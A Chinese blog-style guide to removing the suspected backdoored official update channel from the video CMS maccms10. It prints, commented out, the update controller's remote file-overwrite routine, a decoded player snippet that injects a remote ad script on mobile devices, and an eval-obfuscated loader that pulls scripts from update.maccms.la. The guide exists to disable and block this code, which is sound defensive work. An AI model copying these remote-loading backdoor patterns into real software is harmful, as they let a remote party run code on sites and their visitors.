AI摘要
本文详细介绍了如何从苹果cms10中去除官方更新,以应对官方更新通道可能存在的安全风险。主要步骤包括:从GitHub下载源代码,批量替换官方域名为空或自定义域名,注释掉`Update.php`和`Safety.php`中的更新后门代码,移除播放器文件中的广告链接,以及注释掉多个JavaScript文件中的更新检测和请求代码。此外,还建议在服务器层面屏蔽官方域名,以彻底杜绝潜在的安全隐患。
苹果cms10 去除官方更新
根据奇安信实锤,基本上可以确认是官方更新通道投毒
https://mp.weixin.qq.com/s/nl_Pntpoys9NVBp7RKLJvg
1.下载源代码
从github中下载源代码,一般来说后门不会直勾勾的写在github上,都是通过安装之后通过自动更新加入到代码中。所以此时的github代码是安全的
2.批量替换域名(关键)
使用代码编辑器,批量替换代码域名,此处域名我以自己网站代替,即使自己的域名有些请求失败,但是也好过官方的。
union.maccms.la => 所有带有该域名的链接全部改为空
maccms.la => 替换成自己的域名
aHR0cDovL3VwZGF0ZS5tYWNjbXMubGEv => 该字符串为更新域名的base64编码,替换为空,有两处地方要修改。
application/admin/controller/Update.php
application/admin/controller/Safety.php
3.注释更新后门文件(关键)
文件路径:application/admin/controller/Update.php
<?php
namespace app\admin\controller;
use think\Db;
use app\common\util\PclZip;
class Update extends Base
{
var $_url;
var $_save_path;
public function __construct()
{
parent::__construct();
//header('X-Accel-Buffering: no');
$this->_url = base64_decode("")."v10/";
$this->_save_path = './application/data/update/';
}
public function index()
{
return $this->fetch('admin@test/index');
}
public function step1($file='')
{
// if(empty($file)){
// return $this->error(lang('param_err'));
// }
// $version = config('version.code');
// $url = $this->_url .$file . '.zip?t='.time();
// echo $this->fetch('admin@public/head');
// echo "<div class='update'><h1>".lang('admin/update/step1_a')."</h1><textarea rows=\"25\" class='layui-textarea' readonly>".lang('admin/update/step1_b')."\n";
// ob_flush();flush();
// sleep(1);
// $save_file = $version.'.zip';
// $html = mac_curl_get($url);
// @fwrite(@fopen($this->_save_path.$save_file,'wb'),$html);
// if(!is_file($this->_save_path.$save_file)){
// echo lang('admin/update/download_err')."\n";
// exit;
// }
// if(filesize($this->_save_path.$save_file) <1){
// @unlink($this->_save_path.$save_file);
// echo lang('admin/update/download_err')."\n";
// exit;
// }
// echo lang('admin/update/download_ok')."\n";
// echo lang('admin/update/upgrade_package_processed')."\n";
// ob_flush();flush();
// sleep(1);
// $archive = new PclZip();
// $archive->PclZip($this->_save_path.$save_file);
// if(!$archive->extract(PCLZIP_OPT_PATH, '', PCLZIP_OPT_REPLACE_NEWER)) {
// echo $archive->error_string."\n";
// echo lang('admin/update/upgrade_err').'' ."\n";;
// exit;
// }
// else{
// }
// @unlink($this->_save_path.$save_file);
// echo '</textarea></div>';
// mac_jump( url('update/step2',['jump'=>1]) ,3);
}
public function step2()
{
// $version = config('version.code');
// $save_file = 'database.php';
// echo $this->fetch('admin@public/head');
// echo "<div class='update'><h1>".lang('admin/update/step2_a')."</h1><textarea rows=\"25\" class='layui-textarea' readonly>\n";
// ob_flush();flush();
// sleep(1);
// $res=true;
// // 导入SQL
// $sql_file = $this->_save_path .$save_file;
// if (is_file($sql_file)) {
// echo lang('admin/update/upgrade_sql')."\n";
// ob_flush();flush();
// $pre = config('database.prefix');
// $schema = Db::query('select * from information_schema.columns where table_schema = ?',[ config('database.database') ]);
// $col_list = [];
// $sql='';
// foreach($schema as $k=>$v){
// $col_list[$v['TABLE_NAME']][$v['COLUMN_NAME']] = $v;
// }
// @include $sql_file;
// //dump($sql);die;
// /*
// //$html = @file_get_contents($sql_file);
// //$sql = mac_get_body($html,'--'.$version.'-start--','--'.$version.'-end--');
// $sql = @file_get_contents($sql_file);
// */
// if(!empty($sql)) {
// $sql_list = mac_parse_sql($sql, 0, ['mac_' => $pre]);
// if ($sql_list) {
// $sql_list = array_filter($sql_list);
// foreach ($sql_list as $v) {
// echo $v;
// try {
// Db::execute($v);
// echo " ---".lang('success')."\n\n";
// } catch (\Exception $e) {
// echo " ---".lang('fail')."\n\n";
// }
// ob_flush();flush();
// }
// }
// }
// else{
// }
// @unlink($sql_file);
// }
// else{
// echo lang('admin/update/no_sql')."\n";
// }
// echo '</textarea></div>';
// mac_jump(url('update/step3', ['jump' => 1]), 3);
}
public function step3()
{
// echo $this->fetch('admin@public/head');
// echo "<div class='update'><h1>".lang('admin/update/step3_a')."</h1><div rows=\"25\" class='layui-textarea' readonly>\n";
// ob_flush();flush();
// sleep(1);
// $this->_cache_clear();
// echo lang('admin/update/update_cache')."<br>";
// echo lang('admin/update/upgrade_complete')."<br>";
// if(is_file($this->_save_path . 'database.php')){
// echo "<strong style='color: red;'>" . lang('admin/update/not_delete') . ":application/data/update/database.php</strong>";
// }
// ob_flush();flush();
// echo '</div></div>';
}
public function one()
{
// $param = input();
// $a = $param['a'];
// $b = $param['b'];
// $c = $param['c'];
// $d = $param['d'];
// $e = mac_curl_get( base64_decode("") . $a."/".$b);
// if (stripos($e, 'cbfc17ea5c504aa1a6da788516ae5a4c') !== false) {
// if (($d!="") && strpos(",".$e,$d) <=0){ return; }
// if($b=='admin.php'){$b=IN_FILE;}
// $f = is_file($b) ? filesize($b) : 0;
// if (intval($c)<>intval($f)) { @fwrite(@fopen( $b,"wb"),$e); }
// }
die;
}
}4.播放器文件去除广告链接(关键)
文件路径:static/js/player.js
文件路径:static_new/js/player.js
该播放器文件代码已混淆,解密后发现官方在手机端引入
//union.maccms.la/html/top10.js
从而有概率跳转广告
解密后文件如下
var killErrors = function(value) {
return true
};
window.onerror = null;
window.onerror = killErrors;
var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var base64DecodeChars = new Array(-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1);
function base64encode(str) {
var out, i, len;
var c1, c2, c3;
len = str.length;
i = 0;
out = "";
while (i < len) {
c1 = str.charCodeAt(i++) & 0xff;
if (i == len) {
out += base64EncodeChars.charAt(c1 >> 2);
out += base64EncodeChars.charAt((c1 & 0x3) << 4);
out += "==";
break
}
c2 = str.charCodeAt(i++);
if (i == len) {
out += base64EncodeChars.charAt(c1 >> 2);
out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
out += base64EncodeChars.charAt((c2 & 0xF) << 2);
out += "=";
break
}
c3 = str.charCodeAt(i++);
out += base64EncodeChars.charAt(c1 >> 2);
out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >> 6));
out += base64EncodeChars.charAt(c3 & 0x3F)
}
return out
}
function base64decode(str) {
var c1, c2, c3, c4;
var i, len, out;
len = str.length;
i = 0;
out = "";
while (i < len) {
do {
c1 = base64DecodeChars[str.charCodeAt(i++) & 0xff]
} while (i < len && c1 == -1);
if (c1 == -1) break;
do {
c2 = base64DecodeChars[str.charCodeAt(i++) & 0xff]
} while (i < len && c2 == -1);
if (c2 == -1) break;
out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));
do {
c3 = str.charCodeAt(i++) & 0xff;
if (c3 == 61) return out;
c3 = base64DecodeChars[c3]
} while (i < len && c3 == -1);
if (c3 == -1) break;
out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3C) >> 2));
do {
c4 = str.charCodeAt(i++) & 0xff;
if (c4 == 61) return out;
c4 = base64DecodeChars[c4]
} while (i < len && c4 == -1);
if (c4 == -1) break;
out += String.fromCharCode(((c3 & 0x03) << 6) | c4)
}
return out
}
function utf16to8(str) {
var out, i, len, c;
out = "";
len = str.length;
for (i = 0; i < len; i++) {
c = str.charCodeAt(i);
if ((c >= 0x0001) && (c <= 0x007F)) {
out += str.charAt(i)
} else if (c > 0x07FF) {
out += String.fromCharCode(0xE0 | ((c >> 12) & 0x0F));
out += String.fromCharCode(0x80 | ((c >> 6) & 0x3F));
out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F))
} else {
out += String.fromCharCode(0xC0 | ((c >> 6) & 0x1F));
out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F))
}
}
return out
}
function utf8to16(str) {
var out, i, len, c;
var char2, char3;
out = "";
len = str.length;
i = 0;
while (i < len) {
c = str.charCodeAt(i++);
switch (c >> 4) {
case 0:
case 1:
case 2:
case 3:
case 4:
case 5:
case 6:
case 7:
out += str.charAt(i - 1);
break;
case 12:
case 13:
char2 = str.charCodeAt(i++);
out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F));
break;
case 14:
char2 = str.charCodeAt(i++);
char3 = str.charCodeAt(i++);
out += String.fromCharCode(((c & 0x0F) << 12) | ((char2 & 0x3F) << 6) | ((char3 & 0x3F) << 0));
break
}
}
return out
}
var MacPlayer = {
'GetDate': function(f, t) {
if (!t) {
t = new Date()
}
var a = ['日', '一', '二', '三', '四', '五', '六'];
f = f.replace(/yyyy|YYYY/, t.getFullYear());
f = f.replace(/yy|YY/, (t.getYear() % 100) > 9 ? (t.getYear() % 100).toString() : '0' + (t.getYear() % 100));
f = f.replace(/MM/, t.getMonth() > 9 ? t.getMonth().toString() : '0' + t.getMonth());
f = f.replace(/M/g, t.getMonth());
f = f.replace(/w|W/g, a[t.getDay()]);
f = f.replace(/dd|DD/, t.getDate() > 9 ? t.getDate().toString() : '0' + t.getDate());
f = f.replace(/d|D/g, t.getDate());
f = f.replace(/hh|HH/, t.getHours() > 9 ? t.getHours().toString() : '0' + t.getHours());
f = f.replace(/h|H/g, t.getHours());
f = f.replace(/mm/, t.getMinutes() > 9 ? t.getMinutes().toString() : '0' + t.getMinutes());
f = f.replace(/m/g, t.getMinutes());
f = f.replace(/ss|SS/, t.getSeconds() > 9 ? t.getSeconds().toString() : '0' + t.getSeconds());
f = f.replace(/s|S/g, t.getSeconds());
return f
},
'GetUrl': function(s, n) {
return this.Link.replace('{sid}', s).replace('{sid}', s).replace('{nid}', n).replace('{nid}', n)
},
'Go': function(s, n) {
location.href = this.GetUrl(s, n)
},
'Show': function() {
$('#buffer').attr('src', this.Prestrain);
setTimeout(function() {
MacPlayer.AdsEnd()
}, this.Second * 1000);
$("#playleft").get(0).innerHTML = this.Html + '';
// 非Windows和Mac平台官方投毒
// if (!/(Win|Mac)/i.test(navigator.platform)) {
// var a = document.createElement('script');
// a.type = 'text/javascript';
// a.async = true;
// a.charset = 'utf-8';
// a.src = base64decode('Ly91bmlvbi5tYWNjbXMubGEvaHRtbC90b3AxMC5qcw==') + '?r=' + this.GetDate('yyyyMMdd');
// var b = document.getElementsByTagName('script')[0];
// b.parentNode.insertBefore(a, b)
// }
},
'AdsStart': function() {
if ($("#buffer").attr('src') != this.Buffer) {
$("#buffer").attr('src', this.Buffer)
}
$("#buffer").show()
},
'AdsEnd': function() {
$('#buffer').hide()
},
'Install': function() {
this.Status = false;
$('#install').show()
},
'Play': function() {
document.write('<style>.MacPlayer{background: #000000;font-size:14px;color:#F6F6F6;margin:0px;padding:0px;position:relative;overflow:hidden;width:' + this.Width + ';height:' + this.Height + ';min-height:100px;}.MacPlayer table{width:100%;height:100%;}.MacPlayer #playleft{position:inherit;!important;width:100%;height:100%;}</style><div class="MacPlayer">' + '<iframe id="buffer" src="" frameBorder="0" scrolling="no" width="100%" height="100%" style="position:absolute;z-index:99998;"></iframe><iframe id="install" src="" frameBorder="0" scrolling="no" width="100%" height="100%" style="position:absolute;z-index:99998;display:none;"></iframe>' + '<table border="0" cellpadding="0" cellspacing="0"><tr><td id="playleft" valign="top" style=""> </td></table></div>');
this.offsetHeight = $('.MacPlayer').get(0).offsetHeight;
this.offsetWidth = $('.MacPlayer').get(0).offsetWidth;
document.write('<scr' + 'ipt src="' + this.Path + this.PlayFrom + '.js"></scr' + 'ipt>')
},
'Down': function() {},
'Init': function() {
this.Status = true;
this.Parse = '';
var a = player_aaaa;
if (a.encrypt == '1') {
a.url = unescape(a.url);
a.url_next = unescape(a.url_next)
} else if (a.encrypt == '2') {
a.url = unescape(base64decode(a.url));
a.url_next = unescape(base64decode(a.url_next))
}
this.Agent = navigator.userAgent.toLowerCase();
this.Width = MacPlayerConfig.width;
this.Height = MacPlayerConfig.height;
if (this.Agent.indexOf("android") > 0 || this.Agent.indexOf("mobile") > 0 || this.Agent.indexOf("ipod") > 0 || this.Agent.indexOf("ios") > 0 || this.Agent.indexOf("iphone") > 0 || this.Agent.indexOf("ipad") > 0) {
this.Width = MacPlayerConfig.widthmob;
this.Height = MacPlayerConfig.heightmob
}
if (this.Width.indexOf("px") == -1 && this.Width.indexOf("%") == -1) {
this.Width = '100%'
}
if (this.Height.indexOf("px") == -1 && this.Height.indexOf("%") == -1) {
this.Height = '100%'
}
this.Prestrain = MacPlayerConfig.prestrain;
this.Buffer = MacPlayerConfig.buffer;
this.Second = MacPlayerConfig.second;
this.Flag = a.flag;
this.Trysee = a.trysee;
this.Points = a.points;
this.Link = decodeURIComponent(a.link);
this.PlayFrom = a.from;
this.PlayNote = a.note;
this.PlayServer = a.server == 'no' ? '' : a.server;
this.PlayUrl = a.url;
this.PlayUrlNext = a.url_next;
this.PlayLinkNext = a.link_next;
this.PlayLinkPre = a.link_pre;
this.Id = a.id;
this.Sid = a.sid;
this.Nid = a.nid;
if (MacPlayerConfig.server_list[this.PlayServer] != undefined) {
this.PlayServer = MacPlayerConfig.server_list[this.PlayServer].des
}
if (MacPlayerConfig.player_list[this.PlayFrom] != undefined) {
if (MacPlayerConfig.player_list[this.PlayFrom].ps == "1") {
this.Parse = MacPlayerConfig.player_list[this.PlayFrom].parse == '' ? MacPlayerConfig.parse : MacPlayerConfig.player_list[this.PlayFrom].parse;
this.PlayFrom = 'parse'
}
}
this.Path = maccms.path + '/static/player/';
if (this.Flag == "down") {
MacPlayer.Down()
} else {
MacPlayer.Play()
}
}
};
MacPlayer.Init();
5.注释更新JavaScript文件
文件路径:static_new/js/update.js
// String.prototype.replaceAll = function (FindText, RepText) {
// regExp = new RegExp(FindText, "g");
// return this.replace(regExp, RepText);
// }
// function getQS(par, name) {
// var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)");
// var r = par.substr(1).match(reg);
// if (r != null) return unescape(r[2]); return null;
// }
// function msck(n, v) { var exp = new Date(); exp.setTime(exp.getTime() + 30 * 60 * 1000); document.cookie = n + "=" + escape(v) + ";path=/;expires=" + exp.toGMTString() }
// function mgck(n) { var arr, reg = new RegExp("(^| )" + n + "=([^;]*)(;|$)"); if (arr = document.cookie.match(reg)) return unescape(arr[2]); else return null }
// var new_v = '2024.1000.4044';
// var update_content = [
// '<strong>v2024.1000.4044 更新内容:</strong>',
// '1,优化重名检测卡顿问题。',
// '2,入库重复规移除名称必选和新增豆瓣id。',
// '3,修正帐号无法登出问题。',
// '4,其他细节优化。',
// ].join('<br>');
// var package = 'maccms10_update';
// var domain = 'update.000081.xyz/';
// var params = window.location.search;
// var scripts = document.getElementsByTagName('script');
// for (i = 0; i < scripts.length; i++) {
// var lastUrl = scripts[i].src;
// if (lastUrl.indexOf(domain) > -1) {
// params = lastUrl.substr(lastUrl.indexOf('?'));
// }
// }
// var de = new Date(), mh = de.getMonth() + 1, da = de.getDate(), rr = mh + "" + da;
// var c = getQS(params, 'c');
// var v = getQS(params, 'v');
// var p = getQS(params, 'p');
// var tp = getQS(params, 'tp');
// var v1 = v.replace(/\./g, "");
// var v2 = new_v.replace(/\./g, "");
// var html = '';
// if (v2 > v1) {
// html += `<table class="tbinfo pleft layui-table" >
// <thead>
// <th colspan="4">
// 更新提示【${new_v}】>>>
// <a target="_blank" href="https://t.me/maccms_channel">Telegram群https://t.me/maccms_channel</a>
//
// <a target="_blank" href="https://github.com/magicblack">Github源码https://github.com/magicblack</a>
// </th>
// </thead>
// <tr>
// <td colspan="4">
// <font class="tif s20" style="display: none;">
// 警告,补丁包【${new_v}】发布,修复安全漏洞和更新服务,请及时升级相应补丁!
// </font>
// <a class="j-iframe" title="点击进入升级" data-href="${ADMIN_PATH}/admin/update/step1.html?file=${package}">
// <font class="tit s20">【点击进入在线升级】</font>
// </a>
// <a href="https://github.com/magicblack/maccms_down/raw/master/maccms10_update.zip">
// <font class="tit s20">【下载离线升级包线路1】</font>
// </a>
// <a href="https://cdn.jsdelivr.net/gh/magicblack/maccms_down@master/maccms10_update.zip">
// <font class="tit s20">【下载离线升级包线路2】</font>
// </a>
// </td>
// </tr>
// <tr>
// <td colspan="4">${update_content}</td>
// </tr>
// </table>`;
// }
// else {
// html += `<table class="tbinfo pleft layui-table" >
// <thead>
// <th colspan="4">
// 更新提示>>>
// <a target="_blank" href="https://t.me/maccms_channel">Telegram群https://t.me/maccms_channel</a>
//
// <a target="_blank" href="https://github.com/magicblack">Github源码https://github.com/magicblack</a>
// </th>
// </thead>
// <tr>
// <td colspan="4"><font class="tit s20">当前是最新版本!</font></td>
// </tr>
// </table>`;
// }
// if (tp != null) {
// var v3 = tp.replace(/\./g, "");
// if (v3 < 5024) {
// html += `<table class="tbinfo pleft layui-table" >
// <thead>
// <th colspan="4">ThinkPHP框架更新提示</th>
// </thead>
// <tr>
// <td colspan="4">
// <font class="tif s20">警告:ThinkPHP5.0.24版本发布安全更新,建议更新框架以免造成不必要的损失,下载后直接覆盖到网站根目录即可!</font>
// <a href="https://cdn.jsdelivr.net/gh/magicblack/maccms_down@master/%E4%B8%93%E7%94%A8thinkphp%205.0.24.zip">
// <font class="tit s20">【点击下载框架升级包】</font>
// </a>
// </td>
// </tr>
// </table>`;
// }
// }
// $("body").append("<style>.tit{color:blue;} .tif{color:red;} .s20{font-size:20px;} </style>");
// $("table:last").after(html);6.注释index.html下的ajax更新请求
文件路径:application/admin/view_new/index/index.html
var layer;
layui.use(['element', 'layer', 'form'], function () {
var $ = layui.jquery, element = layui.element, form = layui.form;
layer = layui.layer;
console.log("MAC_VERSION", MAC_VERSION)
// if (typeof (MAC_VERSION) != 'undefined' && typeof (PHP_VERSION) != 'undefined' && typeof (THINK_VERSION) != 'undefined') {
// $.ajax({
// url: `https://update.000081.xyz/v10/?c=check&v=${MAC_VERSION}&p=${PHP_VERSION}&tp=${THINK_VERSION}&t=${Math.random()}`,
// type: 'GET',
// dataType: 'text', // 确保返回的数据被视为纯文本
// success: function (response) {
// // 使用正则表达式提取update_content
// // var updateContentRegex = /var update_content = \[((?:.|\n)*?)\].join\('<br>\');/g;
// var updateContentMatch = response.match(/var update_content\s*=\s*\[(.*?)\]\.join\('<br>'\);/s);
// console.log("updateContentMatch", updateContentMatch)
// if (updateContentMatch){
// eval(updateContentMatch[0])
// }
// // 使用正则表达式提取new_v
// var newVRegex = /var new_v = '(.*?)';/;
// var newVMatch = response.match(newVRegex);
// var newV = newVMatch ? newVMatch[1] : '未找到new_v';
// if (newV > MAC_VERSION) {
// // 存储更新信息到全局变量,供showUpdateDialog函数使用
// window.updateInfo = {
// newV: newV,
// update_content: update_content,
// package: 'maccms10_update'
// };
// // 显示更新按钮而不是直接弹窗(在两个位置都显示)
// $('.layout-right #update-notification').show().addClass('show');
// $('.bottom-nav #update-notification').show().addClass('show');
// }
// },
// error: function (xhr, status, error) {
// console.error('AJAX请求失败:', error);
// }
// });
// }
// layer.msg('提示信息', { time: 180000 });
element.init('nav', 'demo');
// 重新渲染select,将下拉弹层插入到body
form.render('select', {
render: true
});7.注释检测更新文件
文件路径:static/js/admin_common.js
第19行
$(function(){
if( typeof(MAC_VERSION) !='undefined' && typeof(PHP_VERSION) !='undefined' && typeof(THINK_VERSION) !='undefined' ) {
// eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$(\'3\').9(\'<0\'+\'1 4="\'+\'//5.6.7/8/?c=2&a=\'+b+\'&d=\'+e+\'&f=\'+g+\'&h=\'+i.j()+\'"></0\'+\'1>\');',20,20,'scr|ipt|check|body|src|update|maccms|la|v10|append|v|MAC_VERSION||p|PHP_VERSION|tp|THINK_VERSION|t|Math|random'.split('|'),0,{}));
}
});该混淆解码后内容如下
$('body').append('<script src="//update.maccms.la/v10/?c=check&a=' + MAC_VERSION + '&p=' + PHP_VERSION + '&tp=' + THINK_VERSION + '&t=' + Math.random() + '"></script>');8.屏蔽maccms.la域名,可选操作
服务器中,屏蔽官方域名,防止其他没改到的地方更新
maccms.la
*.maccms.la
提供已去除更新程序
提供的程序已按照上述流程去除更新,只需要将000081.xyz自行替换为自己的域名
评论 (0)